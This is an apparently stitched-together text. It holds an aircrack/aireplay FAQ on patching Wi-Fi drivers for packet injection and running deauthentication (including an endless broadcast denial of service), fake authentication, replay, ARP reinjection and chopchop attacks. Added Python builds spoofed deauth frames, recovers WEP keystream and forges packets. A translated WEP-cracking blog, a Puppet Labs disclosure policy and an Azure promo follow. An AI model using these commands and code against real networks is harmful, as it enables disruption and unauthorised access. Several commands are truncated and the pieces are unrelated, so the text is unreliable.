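SAMPLE_ANONCE = bytes(range(32))                # constructed nonce
SAMPLE_SNONCE = bytes(range(32, 64))            # constructed nonce
SAMPLE_EAPOL = b"\x01\x03\x00\x5f" + bytes(95)  # constructed EAPOL-Key body, MIC zeroed


def sample_handshake_mic(passphrase: str, ccmp: bool) -> bytes:
    """MIC a client using 'passphrase' would put in message 2 of the sample
    handshake; used to produce input for dictionary_attack."""
    kck = wpa_ptk(wpa_pmk(passphrase, SAMPLE_SSID), SAMPLE_AA, SAMPLE_SPA,
                  SAMPLE_ANONCE, SAMPLE_SNONCE)[:16]
    return eapol_mic(kck, SAMPLE_EAPOL, ccmp)
```

Because every candidate costs 8192 HMAC-SHA1 operations before the MIC can even be checked, the attack rate is bounded by PBKDF2, which is the reason a long random passphrase defeats it: the handshake itself leaks nothing that shortcuts the derivation.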


How do I patch the driver for injection with aireplay?

So far, aireplay only supports injection with Prism2, PrismGT (FullMAC), Atheros, RTL8180 and Ralink. Injection with Centrino, Hermes, ACX1xx, Aironet, ZyDAS, Marvell and Broadcom is not supported because of firmware and/or driver limitations.

Prism2 and Atheros injection is still quite experimental; if your card seems to hang (no packets captured or injected), bring the interface down, reload the drivers and reinsert the card. Also consider upgrading the firmware (if Prism2).

All drivers must be patched to support injection in Monitor mode. You will need the Linux headers matching the kernel you are running; otherwise, you will have to download the Linux sources and build a custom kernel.

If you have trouble patching and compiling, you may want to use the Troppix LiveCD, which includes patched drivers for these devices.

  • Installing the madwifi driver (Atheros cards)

    Note 1: you will need uudecode from the sharutils package.

    Note 2: the 20051008 patch should also work with more recent madwifi CVS versions.

    Note 3: if you use wpa_supplicant, you should recompile it (old versions are not compatible with the current madwifi CVS), and make sure CONFIG_DRIVER_MADWIFI=y is not commented out in config.h.

    Note 4: with the current madwifi it is no longer necessary to run “iwpriv ath0 mode 2”, since the driver allows injection in mode 0 through the new athXraw interface.


    Allowed PHY modes:
      Mode 0   Auto (a/b/g)
      Mode 1   802.11a only
      Mode 2   802.11b only
      Mode 3   802.11g only

    ifconfig ath0 down
    rmmod wlan_wep ath_rate_sample ath_rate_onoe \
          ath_pci wlan ath_hal 2>/dev/null

    find /lib/modules -name 'ath*' -exec rm -v {} \; 2>/dev/null
    find /lib/modules -name 'wlan*' -exec rm -v {} \; 2>/dev/null
    cd /usr/src
    tar -xvzf madwifi-cvs-20051025.tgz
    cd madwifi-cvs-20051025
    patch -Np1 -i ../madwifi-cvs-20051025.patch
    make KERNELPATH=/usr/src/linux-
    make install
    modprobe ath_pci

    It is now possible to set the transmit rate with madwifi (and with rt2570 as well). The recommended value is 5.5 Mbps, but you can lower or raise it depending on the distance to the AP. For example:

    iwconfig ath0 rate 24M

    Modulation     Allowed rates
    DSSS / CCK     1M, 2M, 5.5M, 11M
    OFDM (a/g)     6M, 9M, 12M, 18M, 24M, 36M, 48M, 54M

    During attacks 2, 3 and 4, changing the number of packets per second that aireplay sends (-x option) sometimes helps to get better results; the default is 500 pps.

  • Installing the prism54 driver (PrismGT FullMAC cards)
    ifconfig eth1 down
    rmmod prism54

    cd /usr/src
    tar -xvzf prism54-svn-20050724.tgz
    cd prism54-svn-20050724
    patch -Np1 -i ../prism54-svn-20050724.patch
    make modules && make install
    mkdir -p /usr/lib/hotplug/firmware
    mkdir -p /lib/firmware
    cp /usr/lib/hotplug/firmware/isl3890
    mv /lib/firmware/isl3890
    depmod -a
  • Installing the HostAP driver (Prism2 cards)
    ifconfig wlan0 down
    wlanctl-ng wlan0 lnxreq_ifstate ifstate=disable
    /etc/init.d/pcmcia stop
    rmmod prism2_pci
    rmmod hostap_pci

    cd /usr/src
    tar -xvzf hostap-driver-0.4.5.tar.gz
    cd hostap-driver-0.4.5
    patch -Np1 -i ../hostap-driver-0.3.9.patch
    make && make install
    mv -f /etc/pcmcia/wlan-ng.conf /etc/pcmcia/wlan-ng.conf~
    /etc/init.d/pcmcia start
    modprobe hostap_pci &>/dev/null
  • Installing the wlan-ng driver (Prism2 cards)

    Important note: when the card is inserted, wlan-ng will flash the firmware into RAM (volatile download) with versions PRI 1.1.4 and STA 1.8.3. Many users had trouble with this operation, in which case it is better to use hostap instead. Besides, HostAP works more reliably and supports iwconfig, while wlan-ng does not.

    ifconfig wlan0 down
    wlanctl-ng wlan0 lnxreq_ifstate ifstate=disable
    /etc/init.d/pcmcia stop
    rmmod prism2_pci
    rmmod hostap_pci
    find /lib/modules \( -name 'p80211*' -o -name 'prism2*' \) \
         -exec rm -v {} \;

    cd /usr/src
    tar -xvzf wlanng-0.2.1-pre26.tar.gz
    cd wlanng-0.2.1-pre26
    patch -Np1 -i ../wlanng-0.2.1-pre26.patch
    make config && make all && make install
    mv /etc/pcmcia/hostap_cs.conf /etc/pcmcia/hostap_cs.conf~
    /etc/init.d/pcmcia start
    modprobe prism2_pci &>/dev/null
  • Installing the r8180-sa2400 driver (RTL8180 cards)
    ifconfig wlan0 down
    rmmod r8180

    cd /usr/src
    tar -xvzf rtl8180-0.21.tar.gz
    cd rtl8180-0.21
    patch -Np1 -i ../rtl8180-0.21.patch
    make && make install
    depmod -a
    modprobe r8180
  • Installing the rt2500 driver (Ralink b/g PCI/PCMCIA)
    ifconfig ra0 down
    rmmod rt2500

    cd /usr/src
    tar -xvzf rt2500-cvs-20051112.tgz
    cd rt2500-cvs-20051112
    cd Module
    make && make install
    modprobe rt2500

    Make sure you load the driver with modprobe (not insmod) and put the card in Monitor mode before bringing the interface up.

  • Installing the rt2570 driver (Ralink b/g USB)
    ifconfig rausb0 down
    rmmod rt2570

    cd /usr/src
    tar -xvzf rt2570-cvs-20051112.tgz
    cd rt2570-cvs-20051112
    cd Module
    make && make install
    modprobe rt2570

The driver doesn't compile.

This usually happens when the headers don't match the kernel you are running. In that case, simply build a new kernel, install it and reboot. Then try compiling the driver again.

See this HOWTO for more details on building the kernel.

How do I use aireplay?

If the driver is properly patched, aireplay is able to inject raw 802.11 packets in Monitor mode; it currently implements a set of 5 different attacks.

If you get the message “ioctl(SIOCGIFINDEX) failed: No such device”, check that your device name is correct and that you did not forget a parameter on the command line.

In the following examples, 00:13:10:30:24:9C is the MAC address of the access point (on channel 6), and 00:09:5B:EB:C5:2B is the MAC address of a wireless client.

  • Attack 0: deauthentication

    This attack is probably the most useful for recovering a hidden (non-broadcast) ESSID and for capturing WPA handshakes by forcing clients to re-authenticate. It can also be used to generate ARP requests, since Windows clients sometimes flush their ARP cache when disconnected. Of course, this attack is totally useless if there are no associated clients.

    It is usually more effective to target a specific station with the -c parameter.

    Some examples:

    • Capture the WPA handshake with an Atheros card:
      start ath0
      airodump ath0 out 6 (switch to another console)
      aireplay -0 5 -a 00:13:10:30:24:9C -c 00:09:5B:EB:C5:2B ath0
      (wait a few seconds)
      aircrack -w /path/to/dictionary out.cap
    • Generate ARP requests with a Prism2 card:
      start wlan0
      airodump wlan0 out 6 (switch to another console)
      aireplay -0 10 -a 00:13:10:30:24:9C wlan0
      aireplay -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B wlan0

      After sending the ten rounds of deauthentication packets, we start listening for ARP requests with attack 3. The -h option is essential and must be the MAC address of an associated client.

      If the driver is wlan-ng, you must run the start script; otherwise the card will not be set up properly for injection.

    • Massive denial of service with an RT2500 card:
      start ra0
      aireplay -0 0 -a 00:13:10:30:24:9C ra0

      With parameter 0, this attack sends deauthentication packets to the broadcast address in an infinite loop, thus preventing clients from staying connected.

  • Attack 1: fake authentication

    This attack is particularly useful when there are no associated clients: we make up a fake client MAC address, which gets recorded in the AP's association table. This address will be used for attacks 3 (ARP request reinjection) and 4 (“chopchop” WEP decryption). It is best to set the card to the MAC being used (below, 00:11:22:33:44:55) so that the driver sends ACKs properly.

    However, if this attack fails and there is already an associated client, it is more effective to simply use its MAC address (here, 00:09:5B:EB:C5:2B) for attacks 3 and 4.

    ifconfig ath0 down
    ifconfig ath0 hw ether 00:11:22:33:44:55
    ifconfig ath0 up

    aireplay -1 0 -e "the ssid" -a 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0
    12:14:06 Sending Authentication Request
    12:14:06 Authentication successful
    12:14:06 Sending Association Request
    12:14:07 Association successful :-)


    With the patched madwifi CVS 2005-08-14, it is possible to inject packets while in Infrastructure mode (the WEP key itself does not matter, as long as the AP accepts open authentication). So, instead of using attack 1, you can just associate and inject / monitor through the athXraw interface:

    ifconfig ath0 down hw ether 00:11:22:33:44:55
    iwconfig ath0 mode Managed essid "the ssid" key AAAAAAAAAA
    ifconfig ath0 up

    sysctl -w dev.ath0.rawdev=1
    ifconfig ath0raw up
    airodump ath0raw out 6

    Then you can run attack 3 or 4 (below, aireplay automatically replaces ath0 with ath0raw):

    aireplay -3 -h 00:11:22:33:44:55 -b 00:13:10:30:24:9C ath0
    aireplay -4 -h 00:10:20:30:40:50 -f 1 ath0

    Some access points require re-authentication every 30 seconds, otherwise our fake client is considered disconnected. In this case use the periodic re-association delay:

    aireplay -1 30 -e "the ssid" -a 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0

    If this attack seems to fail (aireplay keeps sending authentication request packets), MAC address filtering may be in use. Also make sure that:

    • You are close enough to the access point.
    • The driver is properly patched and installed.
    • The card is set to the same channel as the AP.
    • The BSSID and ESSID (-a / -e options) are correct.
    • If it is a Prism2, make sure the firmware is up to date.

    As a reminder: you cannot inject with a Centrino, Hermes, ACX1xx, Aironet, ZyDAS, Marvell or Broadcom chipset because of firmware and/or driver limitations.

  • Attack 2: interactive packet replay

    This attack lets you choose a given packet to replay; it sometimes gives more effective results than attack 3 (automatic ARP reinjection).

    You could use it, for example, to try the “re-broadcast any data” attack, which only works if the AP actually re-encrypts WEP data packets:

    aireplay -2 -b 00:13:10:30:24:9C -n 100 -p 0841 \
             -h 00:09:5B:EB:C5:2B -c FF:FF:FF:FF:FF:FF ath0

    You can also use attack 2 to manually replay WEP-encrypted ARP request packets, whose size is either 68 or 86 bytes (depending on the operating system):

    aireplay -2 -b 00:13:10:30:24:9C -d FF:FF:FF:FF:FF:FF \
             -m 68 -n 68 -p 0841 -h 00:09:5B:EB:C5:2B ath0

    aireplay -2 -b 00:13:10:30:24:9C -d FF:FF:FF:FF:FF:FF \
             -m 86 -n 86 -p 0841 -h 00:09:5B:EB:C5:2B ath0
  • Attack 3: ARP request reinjection

    The classic ARP request reinjection attack is the most effective way to generate new IVs, and works very reliably. You need either the MAC address of an associated client (00:09:5B:EB:C5:2B) or that of a fake client from attack 1 (00:11:22:33:44:55). You may have to wait a couple of minutes, or even longer, until an ARP request shows up; this attack will fail if there is no traffic.

    Please note that you can also reuse an ARP request from a previous capture with the -r switch.

    aireplay -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0
    Saving ARP requests in replay_arp-0627-121526.cap
    You must also start airodump to capture replies.
    Read 2493 packets (got 1 ARP requests), sent 1305 packets...
  • Attack 4: KoreK's “chopchop” (CRC prediction)

    This attack, when successful, can decrypt a WEP data packet without knowing the key. It can even work with dynamic WEP. This attack does not recover the WEP key itself, but merely reveals the plaintext. However, most access points are not vulnerable at all. Some may at first seem vulnerable but actually drop packets shorter than 60 bytes. This attack needs at least one WEP data packet.

    1. First, let's decrypt a packet:
      aireplay -4 -h 00:09:5B:EB:C5:2B ath0
    2. Let's have a look at the IP address:
      tcpdump -s 0 -n -e -r replay_dec-0627-022301.cap
      reading from file replay_dec-0627-022301.cap, link-type [...]
      IP > icmp 64: echo request seq 1
    3. Now, let's forge an ARP request.

      The source IP does not matter, but the destination IP must reply to ARP requests. The source MAC address must belong to an associated station.

      ./arpforge replay_dec-0627-022301.xor 1 00:13:10:30:24:9C \
                 00:09:5B:EB:C5:2B arp.cap
    4. And let's replay our forged ARP request:
      aireplay -2 -r arp.cap ath0
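As an added example for attack 0 (this is not aireplay code), the raw 802.11 deauthentication frame that a directed "aireplay -0" round injects, built and decoded with nothing but struct. The point it makes is why the attack works on open, WEP and WPA networks alike: management frames in the generation of 802.11 this FAQ covers are neither encrypted nor integrity-protected, so a forged frame claiming to come from the AP is honoured by the client, which then has to re-authenticate (and, on WPA, redo the 4-way handshake airodump is waiting for). The MAC addresses are the ones used in this FAQ's examples; the duration value, the reason code and the "two frames per round" model are assumptions chosen for the example, not aireplay's documented behaviour.

```python
"""Added example for attack 0 (not aireplay code).

Build and decode a raw 802.11 deauthentication frame. Duration, reason code
and the two-frames-per-round model are assumptions made for this example.
"""
import struct

FC_DEAUTH = 0xC0     # frame control byte 0: version 0, type 0 (management), subtype 12
BROADCAST = "ff:ff:ff:ff:ff:ff"
FRAME_LEN = 26       # 24-byte MAC header + 2-byte reason code


def mac_bytes(addr: str) -> bytes:
    """'00:13:10:30:24:9C' -> 6 raw bytes."""
    return bytes.fromhex(addr.replace(":", "").replace("-", ""))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def build_deauth(dst: str, src: str, bssid: str, seq: int = 0, reason: int = 7) -> bytes:
    """Deauthentication frame: FC, flags, duration, addr1 (receiver), addr2
    (claimed transmitter), addr3 (BSSID), sequence control, reason code.

    dst: station being kicked (a client MAC, or BROADCAST as with -0 and no -c)
    src: who the frame pretends to be (the AP)
    reason 7 ("class 3 frame received from nonassociated station") is an assumed choice
    """
    header = struct.pack("<BBH", FC_DEAUTH, 0x00, 0x013A)   # duration 314 us, assumed
    header += mac_bytes(dst) + mac_bytes(src) + mac_bytes(bssid)
    header += struct.pack("<H", (seq & 0x0FFF) << 4)         # sequence number << 4 | fragment 0
    return header + struct.pack("<H", reason)


def parse_deauth(frame: bytes) -> dict:
    """Decode a deauthentication frame; ValueError for anything else."""
    if len(frame) < FRAME_LEN:
        raise ValueError("frame too short")
    fc0, _flags, _duration = struct.unpack_from("<BBH", frame, 0)
    if fc0 != FC_DEAUTH:
        raise ValueError("not a deauthentication frame")
    (seq_ctrl,) = struct.unpack_from("<H", frame, 22)
    (reason,) = struct.unpack_from("<H", frame, 24)
    return {
        "dst": mac_str(frame[4:10]),
        "src": mac_str(frame[10:16]),
        "bssid": mac_str(frame[16:22]),
        "seq": seq_ctrl >> 4,
        "reason": reason,
    }


def directed_deauth_round(ap: str, client: str, seq: int = 0) -> list:
    """One round of 'aireplay -0 N -a AP -c CLIENT', modelled as two frames:
    the client is told the AP dropped it, and the AP is told the client left.
    Nothing in either frame proves who really sent it."""
    return [build_deauth(client, ap, ap, seq), build_deauth(ap, client, ap, seq + 1)]


def broadcast_deauth(ap: str, seq: int = 0) -> bytes:
    """'aireplay -0 0 -a AP' without -c: one frame aimed at every station."""
    return build_deauth(BROADCAST, ap, ap, seq)
```

The frames above are only built in memory; transmitting them needs a driver that accepts raw frames in Monitor mode, which is exactly what the patching section of this FAQ is about.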
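As a second added example (this is not aircrack, airdecap or arpforge code), the WEP mechanics that three parts of this FAQ rely on, in working Python: the per-packet RC4 key is just the clear-text 24-bit IV prepended to the shared key, which is the structural weakness described under "Will WPA be cracked in the future?"; decrypting a frame with a known key and checking the CRC-32 ICV is what airdecap -w does; and once the plaintext of a single frame is known, XOR recovers the RC4 keystream for that IV (the .xor PRGA file that attack 4 / chopchop writes), which is enough to forge any shorter frame for that IV without the WEP key, which is what arpforge does. The 802.11 header is omitted, so a "frame body" here is IV || key index || RC4(data || ICV). The 104-bit key is the one from this FAQ's airdecap example; the IV and payloads are sample values.

```python
"""Added example (not aircrack, airdecap or arpforge code).

WEP per-packet key construction, airdecap-style decryption with ICV check,
keystream recovery from one known plaintext, and arpforge-style forging.
Keys, IVs and payloads are sample values; the 802.11 header is omitted.
"""
import struct
import zlib
from typing import Optional, Tuple


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4: key scheduling (KSA) followed by keystream generation (PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_per_packet_key(iv: bytes, wep_key: bytes) -> bytes:
    """WEP's only 'key mixing': the 24-bit IV sent in the clear, followed by the
    40- or 104-bit shared key. No hashing, and no discarded RC4 output."""
    if len(iv) != 3 or len(wep_key) not in (5, 13):
        raise ValueError("IV must be 3 bytes, WEP key 5 or 13 bytes")
    return iv + wep_key


def icv(data: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the plaintext, little-endian."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(iv: bytes, wep_key: bytes, plaintext: bytes) -> bytes:
    """Frame body = IV (3) || key index (1, here 0) || RC4(plaintext || ICV)."""
    return iv + b"\x00" + rc4(wep_per_packet_key(iv, wep_key), plaintext + icv(plaintext))


def wep_decrypt(frame_body: bytes, wep_key: bytes) -> Optional[bytes]:
    """What airdecap -w does per frame: rebuild the per-packet key from the clear
    IV, run RC4, verify the ICV. None means wrong key or a damaged frame."""
    iv, body = frame_body[:3], frame_body[4:]
    plain = rc4(wep_per_packet_key(iv, wep_key), body)
    data, tag = plain[:-4], plain[-4:]
    return data if tag == icv(data) else None


def recover_keystream(frame_body: bytes, known_plaintext: bytes) -> Tuple[bytes, bytes]:
    """Once one frame's plaintext is known (via chopchop, or a guessed ARP/ICMP
    packet), XOR yields the RC4 keystream for that IV: the contents of the .xor
    PRGA file. The WEP key itself is never needed for this."""
    iv, body = frame_body[:3], frame_body[4:]
    keystream = bytes(c ^ p for c, p in zip(body, known_plaintext + icv(known_plaintext)))
    return iv, keystream


def forge_with_keystream(iv: bytes, keystream: bytes, new_plaintext: bytes) -> bytes:
    """arpforge: build a valid frame body for the same IV from the recovered
    keystream; the AP accepts it because the ICV checks out. The new packet
    cannot be longer than the keystream that was recovered."""
    plain = new_plaintext + icv(new_plaintext)
    if len(plain) > len(keystream):
        raise ValueError("recovered keystream is shorter than the new packet")
    return iv + b"\x00" + bytes(p ^ k for p, k in zip(plain, keystream))
```

Because the ICV is a linear CRC rather than a keyed MAC, a forged frame built this way is indistinguishable to the AP from a genuine one; that linearity is also what chopchop exploits to guess the plaintext a byte at a time.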

Hacking Wireless: Aircrack

In this mini-tutorial I explain how to connect to a wireless network that uses WEP encryption from Windows or Linux. First of all I want to say that this tutorial is not meant for stealing information, attacking other machines or other vandalism, but is educational in nature: to teach a bit more about how wireless networks work. In fact I will lean heavily on Wikipedia for definitions of the more technical terms.

First, I want you to watch this video:

The video shows step by step what you have to do to recover the WEP key of a wireless network and connect to it. It is not as simple as the video makes it look.

This reminded me of a video from The Broken in which they recovered wireless keys with a sniffer and AirSnort by capturing packets. It works like this: the sniffer captures traffic; the captured traffic does not contain the key itself, but each packet's clear-text IV together with its encrypted data leaks a little about it, and AirSnort recovers the key statistically from enough such packets. The problem is that you had to capture a LOT of packets to obtain the key. If your neighbour's network did not have much traffic, it could take weeks.

AirCrack, the program used in the video, has two advantages: first, everything is integrated (sniffer, packet capture, cracker...), and second, there are versions for both Windows and Linux.

Everything looks very nice and fast in the video, but that's not how things are. Let's go step by step through what is done in the video and what problems we may run into.

Before anything else you must get ready to use the program. You need a scanner such as NetStumbler to see the networks around you, which ones use WEP encryption and which channel they operate on. Second, you must put your card in monitor mode (often loosely called promiscuous mode).

On Linux this is simple:

iwconfig [adapter] mode monitor

On Windows it is more complicated. You need to download a specific driver. The AirCrack website explains in detail which are compatible and which are not. In that list you can check which driver you need and, depending on which it is, download it: Atheros or Hermes. You will also need the files Peek.dll, Peek5.sys and Msvcr70.dll, which can be downloaded here and must be placed in the same directory as aircrack.exe.

NOTE: on Linux all of this would be done with a single command... This tells us once again that if we want more control over our operating system... WE HAVE TO MIGRATE TO LINUX!!

Once everything is ready to use AirCrack, we start by running it and, from it, running airodump to capture packets. Select the wireless card, say what type the interface is: Atheros (a) or Hermes (o), select the channel the target wireless network is on (NetStumbler told you), and finally give the name of the file where you want to save the capture and whether you only want to capture networks with a WEP key. And off you go capturing traffic!

Here another question may come up: how much traffic to capture? You need between 500,000 and 1,000,000 IVs if the WEP key is 104 bits. The IVs (initialization vectors) are the 24-bit per-packet values that WEP prepends to the key; the attack needs many distinct ones.

Once we have reached those figures, stop airodump and run AirCrack, select the file with airodump's capture and that's it! It took me 30 seconds with 500,000 packets on Windows and 23 seconds with 500,000 packets on Ubuntu.

NOTE: I had trouble going back to normal, non-promiscuous mode. I had to reinstall my old wireless card driver, so locate it before doing anything!!

Any questions or comments... Leave a comment! Cheers.

Infrastructure Security

This process should be followed for reporting issues with Puppet Labs infrastructure such as:

  • yum/
  • and any of our other web properties other than the Forge

While we do believe in crediting security researchers who make valuable contributions to our product security, note that we do not typically provide such credit for minor infrastructure security issues on our web properties.

Note that we do not consider the following class of issues to be report-worthy when they relate to our infrastructure:

  • Software version/Banner disclosure
  • Directory traversal on yum/apt/ where traversal is explicitly desired
  • Self-XSS/CSRF on unauthenticated web forms (including logout CSRF)
  • Disclosure/Discovery of known public files or directories (e.g., robots.txt, simple DNS enumeration)
  • Brute Force attempts (e.g., Login Page/Forgot Password without lockouts)
  • Account enumeration (e.g., enumerating Login/Reset fields for valid accounts without lockouts)

To contact the Puppet Labs Infrastructure team, please use the email address:

Product Security

This process should be followed for reporting issues with any Puppet Labs products such as Puppet Enterprise, Puppet and MCollective, as well as the Puppet Forge. This process should also be followed for any security issues related to packages we distribute; however, please follow the Infrastructure Security process for the infrastructure hosting those packages (yum/, etc.).

If you wish to contact the Puppet Labs Security Team via encrypted communication, we encourage you to use our GPG Public Key:

Puppet Labs Security Team <>
Key Long-format ID: 8728524FE21D3FC6
Key Fingerprint: 489C F9E6 BB24 2589 EFF5 BB68 8728 524F E21D 3FC6

The key is available in ASCII encoded format here. It can also be retrieved and verified from the MIT Key Server.

Puppet Labs is happy to fully disclose all details of a security vulnerability but in the interest of coordinated disclosure we do ask security researchers and other stakeholders to allow us sufficient time to patch the vulnerability before publishing the details.

We believe in crediting security researchers based on the value of the contributions provided. Our security team reviews each disclosure and assigns a scored value based on the relevance of the disclosure. These scores are calculated quarterly and the top individuals are publicly credited on our website. Additional credit will be awarded to those that provide code fixes or additional information about how to fix the disclosure.

Security Disclosures

Infrastructure as Code – Automation of Your Cloud Operations

Azure MVP Matous Rokos and Ken Kaban from PowerON discuss the power of automation and templates for Azure best practice. If you would like to learn more, visit our website:
Alternatively, please email us at:
Are you following us on social media? We post updates everyday.
